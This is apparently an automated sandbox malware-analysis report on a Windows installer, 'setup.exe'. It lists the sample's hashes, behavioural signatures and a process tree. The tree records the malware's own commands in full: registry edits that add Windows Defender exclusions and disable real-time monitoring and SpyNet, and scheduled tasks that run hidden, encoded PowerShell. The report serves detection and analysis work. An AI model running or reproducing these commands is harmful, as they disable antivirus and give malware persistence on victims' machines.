Analysis

  • max time kernel
    117s
  • max time network
    119s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    11-11-2024 08:05

General

  • Target

    PL/setup.exe

  • Size

    7.3MB

  • MD5

    8b036a5a7406f7227ac65f44e1827fca

  • SHA1

    3a8499ecca8be3f69cc7163b03f3f499bbe8276f

  • SHA256

    85250ca9f679cdfebe009b7d66e409b330b35d6021e84e2ef7ceb0d64acdeff1

  • SHA512

    91cecf5c22bd32fe5cead41884773933b49791e57e00a369818d716dea34433bb558e9feb5b2dfc37f2b4b3488c05dcc50ef1b0f267936c2945308f2e9f32b5a

  • SSDEEP

    196608:91OeU0YzI5dCR00/4+cmJ/Dwami5rf0RejcO2h4I:3OxOCClgwa70Rej2h4I

Malware Config

Signatures

  • Modifies Windows Defender Real-time Protection settings 3 TTPs 4 IoCs
  • Windows security bypass 2 TTPs 36 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Run Powershell and hide display window.

  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 4 IoCs
  • Indirect Command Execution 1 TTPs 2 IoCs

    Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters.

  • Loads dropped DLL 12 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops Chrome extension 1 IoCs
  • Drops file in System32 directory 19 IoCs
  • Drops file in Program Files directory 13 IoCs
  • Drops file in Windows directory 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Enumerates system info in registry 2 TTPs 4 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 13 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 28 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\PL\setup.exe
    "C:\Users\Admin\AppData\Local\Temp\PL\setup.exe"
    1⤵
    • Loads dropped DLL
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:1804
    • C:\Users\Admin\AppData\Local\Temp\7zSEDA9.tmp\Install.exe
      .\Install.exe
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2160
      • C:\Users\Admin\AppData\Local\Temp\7zSEF5E.tmp\Install.exe
        .\Install.exe /S /site_id "525403"
        3⤵
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Loads dropped DLL
        • Drops file in System32 directory
        • System Location Discovery: System Language Discovery
        • Enumerates system info in registry
        • Suspicious use of WriteProcessMemory
        PID:2732
        • C:\Windows\SysWOW64\forfiles.exe
          "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
          4⤵
          • Indirect Command Execution
          • Suspicious use of WriteProcessMemory
          PID:2632
          • C:\Windows\SysWOW64\cmd.exe
            /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:2644
            • \??\c:\windows\SysWOW64\reg.exe
              REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
              6⤵
                PID:2700
              • \??\c:\windows\SysWOW64\reg.exe
                REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
                6⤵
                • System Location Discovery: System Language Discovery
                PID:2112
          • C:\Windows\SysWOW64\forfiles.exe
            "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
            4⤵
            • Indirect Command Execution
            • Suspicious use of WriteProcessMemory
            PID:2572
            • C:\Windows\SysWOW64\cmd.exe
              /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:2652
              • \??\c:\windows\SysWOW64\reg.exe
                REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
                6⤵
                  PID:1716
                • \??\c:\windows\SysWOW64\reg.exe
                  REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
                  6⤵
                    PID:2400
              • C:\Windows\SysWOW64\schtasks.exe
                schtasks /CREATE /TN "gEDlVAekT" /SC once /ST 02:34:50 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                4⤵
                • System Location Discovery: System Language Discovery
                • Scheduled Task/Job: Scheduled Task
                PID:1980
              • C:\Windows\SysWOW64\schtasks.exe
                schtasks /run /I /tn "gEDlVAekT"
                4⤵
                • System Location Discovery: System Language Discovery
                PID:2668
              • C:\Windows\SysWOW64\schtasks.exe
                schtasks /DELETE /F /TN "gEDlVAekT"
                4⤵
                  PID:592
                • C:\Windows\SysWOW64\schtasks.exe
                  schtasks /CREATE /TN "bJbhxhmwQPPePEjnjA" /SC once /ST 08:07:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\alLGALgTRSblXywJD\nzjBlZvpbSzibxG\iWPKQQk.exe\" sw /site_id 525403 /S" /V1 /F
                  4⤵
                  • Drops file in Windows directory
                  • System Location Discovery: System Language Discovery
                  • Scheduled Task/Job: Scheduled Task
                  PID:1960
          • C:\Windows\system32\taskeng.exe
            taskeng.exe {27060871-541F-48DA-9983-D97FD8321013} S-1-5-21-1488793075-819845221-1497111674-1000:UPNECVIU\Admin:Interactive:[1]
            1⤵
              PID:2928
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                2⤵
                • Command and Scripting Interpreter: PowerShell
                • Drops file in System32 directory
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:3068
                • C:\Windows\system32\gpupdate.exe
                  "C:\Windows\system32\gpupdate.exe" /force
                  3⤵
                    PID:1728
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                  2⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Drops file in System32 directory
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1940
                  • C:\Windows\system32\gpupdate.exe
                    "C:\Windows\system32\gpupdate.exe" /force
                    3⤵
                      PID:344
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                    2⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Drops file in System32 directory
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:1668
                    • C:\Windows\system32\gpupdate.exe
                      "C:\Windows\system32\gpupdate.exe" /force
                      3⤵
                        PID:1624
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                      2⤵
                      • Command and Scripting Interpreter: PowerShell
                      • Drops file in System32 directory
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:908
                      • C:\Windows\system32\gpupdate.exe
                        "C:\Windows\system32\gpupdate.exe" /force
                        3⤵
                          PID:2776
                    • C:\Windows\system32\gpscript.exe
                      gpscript.exe /RefreshSystemParam
                      1⤵
                        PID:2788
                      • C:\Windows\system32\taskeng.exe
                        taskeng.exe {E7D37AEC-52BB-4548-8C6F-972E6D0BCF3B} S-1-5-18:NT AUTHORITY\System:Service:
                        1⤵
                          PID:1460
                          • C:\Users\Admin\AppData\Local\Temp\alLGALgTRSblXywJD\nzjBlZvpbSzibxG\iWPKQQk.exe
                            C:\Users\Admin\AppData\Local\Temp\alLGALgTRSblXywJD\nzjBlZvpbSzibxG\iWPKQQk.exe sw /site_id 525403 /S
                            2⤵
                            • Executes dropped EXE
                            • Drops file in System32 directory
                            • System Location Discovery: System Language Discovery
                            PID:3004
                            • C:\Windows\SysWOW64\schtasks.exe
                              schtasks /CREATE /TN "gUABfsEIY" /SC once /ST 06:48:15 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                              3⤵
                              • System Location Discovery: System Language Discovery
                              • Scheduled Task/Job: Scheduled Task
                              PID:444
                            • C:\Windows\SysWOW64\schtasks.exe
                              schtasks /run /I /tn "gUABfsEIY"
                              3⤵
                                PID:1568
                              • C:\Windows\SysWOW64\schtasks.exe
                                schtasks /DELETE /F /TN "gUABfsEIY"
                                3⤵
                                  PID:1344
                                • C:\Windows\SysWOW64\cmd.exe
                                  cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
                                  3⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:2376
                                  • C:\Windows\SysWOW64\reg.exe
                                    REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
                                    4⤵
                                    • Modifies Windows Defender Real-time Protection settings
                                    • System Location Discovery: System Language Discovery
                                    PID:2344
                                • C:\Windows\SysWOW64\cmd.exe
                                  cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
                                  3⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:2496
                                  • C:\Windows\SysWOW64\reg.exe
                                    REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
                                    4⤵
                                    • Modifies Windows Defender Real-time Protection settings
                                    PID:2396
                                • C:\Windows\SysWOW64\schtasks.exe
                                  schtasks /CREATE /TN "gFVZKFScg" /SC once /ST 01:16:34 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                  3⤵
                                  • System Location Discovery: System Language Discovery
                                  • Scheduled Task/Job: Scheduled Task
                                  PID:1012
                                • C:\Windows\SysWOW64\schtasks.exe
                                  schtasks /run /I /tn "gFVZKFScg"
                                  3⤵
                                    PID:1676
                                  • C:\Windows\SysWOW64\schtasks.exe
                                    schtasks /DELETE /F /TN "gFVZKFScg"
                                    3⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:2388
                                  • C:\Windows\SysWOW64\cmd.exe
                                    cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\biwNYXhGTKCQxjLv" /t REG_DWORD /d 0 /reg:32
                                    3⤵
                                      PID:1980
                                      • C:\Windows\SysWOW64\reg.exe
                                        REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\biwNYXhGTKCQxjLv" /t REG_DWORD /d 0 /reg:32
                                        4⤵
                                        • Windows security bypass
                                        • System Location Discovery: System Language Discovery
                                        PID:2680
                                    • C:\Windows\SysWOW64\cmd.exe
                                      cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\biwNYXhGTKCQxjLv" /t REG_DWORD /d 0 /reg:64
                                      3⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:648
                                      • C:\Windows\SysWOW64\reg.exe
                                        REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\biwNYXhGTKCQxjLv" /t REG_DWORD /d 0 /reg:64
                                        4⤵
                                        • Windows security bypass
                                        • System Location Discovery: System Language Discovery
                                        PID:1496
                                    • C:\Windows\SysWOW64\cmd.exe
                                      cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\biwNYXhGTKCQxjLv" /t REG_DWORD /d 0 /reg:32
                                      3⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:2992
                                      • C:\Windows\SysWOW64\reg.exe
                                        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\biwNYXhGTKCQxjLv" /t REG_DWORD /d 0 /reg:32
                                        4⤵
                                          PID:3048
                                      • C:\Windows\SysWOW64\cmd.exe
                                        cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\biwNYXhGTKCQxjLv" /t REG_DWORD /d 0 /reg:64
                                        3⤵
                                        • System Location Discovery: System Language Discovery
                                        PID:1004
                                        • C:\Windows\SysWOW64\reg.exe
                                          REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\biwNYXhGTKCQxjLv" /t REG_DWORD /d 0 /reg:64
                                          4⤵
                                            PID:3060
                                        • C:\Windows\SysWOW64\cmd.exe
                                          cmd /C copy nul "C:\Windows\Temp\biwNYXhGTKCQxjLv\hfwsOKJx\FcAhvhVUcyKlmmgL.wsf"
                                          3⤵
                                          • System Location Discovery: System Language Discovery
                                          PID:2008
                                        • C:\Windows\SysWOW64\wscript.exe
                                          wscript "C:\Windows\Temp\biwNYXhGTKCQxjLv\hfwsOKJx\FcAhvhVUcyKlmmgL.wsf"
                                          3⤵
                                          • Modifies data under HKEY_USERS
                                          PID:2988
                                          • C:\Windows\SysWOW64\reg.exe
                                            "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LsajhStaXkJRC" /t REG_DWORD /d 0 /reg:32
                                            4⤵
                                            • Windows security bypass
                                            • System Location Discovery: System Language Discovery
                                            PID:2648
                                          • C:\Windows\SysWOW64\reg.exe
                                            "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LsajhStaXkJRC" /t REG_DWORD /d 0 /reg:64
                                            4⤵
                                            • Windows security bypass
                                            • System Location Discovery: System Language Discovery
                                            PID:2276
                                          • C:\Windows\SysWOW64\reg.exe
                                            "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QpigBxJgKxUn" /t REG_DWORD /d 0 /reg:32
                                            4⤵
                                            • Windows security bypass
                                            • System Location Discovery: System Language Discovery
                                            PID:2888
                                          • C:\Windows\SysWOW64\reg.exe
                                            "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QpigBxJgKxUn" /t REG_DWORD /d 0 /reg:64
                                            4⤵
                                            • Windows security bypass
                                            • System Location Discovery: System Language Discovery
                                            PID:2044
                                          • C:\Windows\SysWOW64\reg.exe
                                            "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YNUWFfCEdUiU2" /t REG_DWORD /d 0 /reg:32
                                            4⤵
                                            • Windows security bypass
                                            • System Location Discovery: System Language Discovery
                                            PID:2900
                                          • C:\Windows\SysWOW64\reg.exe
                                            "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YNUWFfCEdUiU2" /t REG_DWORD /d 0 /reg:64
                                            4⤵
                                            • Windows security bypass
                                            PID:1836
                                          • C:\Windows\SysWOW64\reg.exe
                                            "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZRxaODbjXejAAfVsBUR" /t REG_DWORD /d 0 /reg:32
                                            4⤵
                                            • Windows security bypass
                                            PID:2352
                                          • C:\Windows\SysWOW64\reg.exe
                                            "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZRxaODbjXejAAfVsBUR" /t REG_DWORD /d 0 /reg:64
                                            4⤵
                                            • Windows security bypass
                                            • System Location Discovery: System Language Discovery
                                            PID:1832
                                          • C:\Windows\SysWOW64\reg.exe
                                            "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oWxSecJNU" /t REG_DWORD /d 0 /reg:32
                                            4⤵
                                            • Windows security bypass
                                            • System Location Discovery: System Language Discovery
                                            PID:2012
                                          • C:\Windows\SysWOW64\reg.exe
                                            "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oWxSecJNU" /t REG_DWORD /d 0 /reg:64
                                            4⤵
                                            • Windows security bypass
                                            • System Location Discovery: System Language Discovery
                                            PID:2908
                                          • C:\Windows\SysWOW64\reg.exe
                                            "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\eiYaNjTCbhfbMeVB" /t REG_DWORD /d 0 /reg:32
                                            4⤵
                                            • Windows security bypass
                                            • System Location Discovery: System Language Discovery
                                            PID:1248
                                          • C:\Windows\SysWOW64\reg.exe
                                            "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\eiYaNjTCbhfbMeVB" /t REG_DWORD /d 0 /reg:64
                                            4⤵
                                            • Windows security bypass
                                            • System Location Discovery: System Language Discovery
                                            PID:2848
                                          • C:\Windows\SysWOW64\reg.exe
                                            "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\alLGALgTRSblXywJD" /t REG_DWORD /d 0 /reg:32
                                            4⤵
                                            • Windows security bypass
                                            PID:1720
                                          • C:\Windows\SysWOW64\reg.exe
                                            "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\alLGALgTRSblXywJD" /t REG_DWORD /d 0 /reg:64
                                            4⤵
                                            • Windows security bypass
                                            • System Location Discovery: System Language Discovery
                                            PID:444
                                          • C:\Windows\SysWOW64\reg.exe
                                            "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\biwNYXhGTKCQxjLv" /t REG_DWORD /d 0 /reg:32
                                            4⤵
                                            • Windows security bypass
                                            • System Location Discovery: System Language Discovery
                                            PID:676
                                          • C:\Windows\SysWOW64\reg.exe
                                            "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\biwNYXhGTKCQxjLv" /t REG_DWORD /d 0 /reg:64
                                            4⤵
                                            • Windows security bypass
                                            • System Location Discovery: System Language Discovery
                                            PID:944
                                          • C:\Windows\SysWOW64\reg.exe
                                            "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LsajhStaXkJRC" /t REG_DWORD /d 0 /reg:32
                                            4⤵
                                              PID:848
                                            • C:\Windows\SysWOW64\reg.exe
                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LsajhStaXkJRC" /t REG_DWORD /d 0 /reg:64
                                              4⤵
                                              • System Location Discovery: System Language Discovery
                                              PID:1940
                                            • C:\Windows\SysWOW64\reg.exe
                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QpigBxJgKxUn" /t REG_DWORD /d 0 /reg:32
                                              4⤵
                                              • System Location Discovery: System Language Discovery
                                              PID:2380
                                            • C:\Windows\SysWOW64\reg.exe
                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QpigBxJgKxUn" /t REG_DWORD /d 0 /reg:64
                                              4⤵
                                              • System Location Discovery: System Language Discovery
                                              PID:1572
                                            • C:\Windows\SysWOW64\reg.exe
                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YNUWFfCEdUiU2" /t REG_DWORD /d 0 /reg:32
                                              4⤵
                                                PID:972
                                              • C:\Windows\SysWOW64\reg.exe
                                                "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YNUWFfCEdUiU2" /t REG_DWORD /d 0 /reg:64
                                                4⤵
                                                • System Location Discovery: System Language Discovery
                                                PID:1664
                                              • C:\Windows\SysWOW64\reg.exe
                                                "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZRxaODbjXejAAfVsBUR" /t REG_DWORD /d 0 /reg:32
                                                4⤵
                                                • System Location Discovery: System Language Discovery
                                                PID:2512
                                              • C:\Windows\SysWOW64\reg.exe
                                                "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZRxaODbjXejAAfVsBUR" /t REG_DWORD /d 0 /reg:64
                                                4⤵
                                                • System Location Discovery: System Language Discovery
                                                PID:2196
                                              • C:\Windows\SysWOW64\reg.exe
                                                "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oWxSecJNU" /t REG_DWORD /d 0 /reg:32
                                                4⤵
                                                • System Location Discovery: System Language Discovery
                                                PID:1416
                                              • C:\Windows\SysWOW64\reg.exe
                                                "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oWxSecJNU" /t REG_DWORD /d 0 /reg:64
                                                4⤵
                                                • System Location Discovery: System Language Discovery
                                                PID:1296
                                              • C:\Windows\SysWOW64\reg.exe
                                                "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\eiYaNjTCbhfbMeVB" /t REG_DWORD /d 0 /reg:32
                                                4⤵
                                                  PID:2924
                                                • C:\Windows\SysWOW64\reg.exe
                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\eiYaNjTCbhfbMeVB" /t REG_DWORD /d 0 /reg:64
                                                  4⤵
                                                  • System Location Discovery: System Language Discovery
                                                  PID:2016
                                                • C:\Windows\SysWOW64\reg.exe
                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\alLGALgTRSblXywJD" /t REG_DWORD /d 0 /reg:32
                                                  4⤵
                                                    PID:2748
                                                  • C:\Windows\SysWOW64\reg.exe
                                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\alLGALgTRSblXywJD" /t REG_DWORD /d 0 /reg:64
                                                    4⤵
                                                      PID:1344
                                                    • C:\Windows\SysWOW64\reg.exe
                                                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\biwNYXhGTKCQxjLv" /t REG_DWORD /d 0 /reg:32
                                                      4⤵
                                                      • System Location Discovery: System Language Discovery
                                                      PID:2304
                                                    • C:\Windows\SysWOW64\reg.exe
                                                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\biwNYXhGTKCQxjLv" /t REG_DWORD /d 0 /reg:64
                                                      4⤵
                                                      • System Location Discovery: System Language Discovery
                                                      PID:1516
                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                    schtasks /CREATE /TN "gepROiyfk" /SC once /ST 02:12:57 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                    3⤵
                                                    • System Location Discovery: System Language Discovery
                                                    • Scheduled Task/Job: Scheduled Task
                                                    PID:1012
                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                    schtasks /run /I /tn "gepROiyfk"
                                                    3⤵
                                                      PID:1920
                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                      schtasks /DELETE /F /TN "gepROiyfk"
                                                      3⤵
                                                        PID:1276
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32
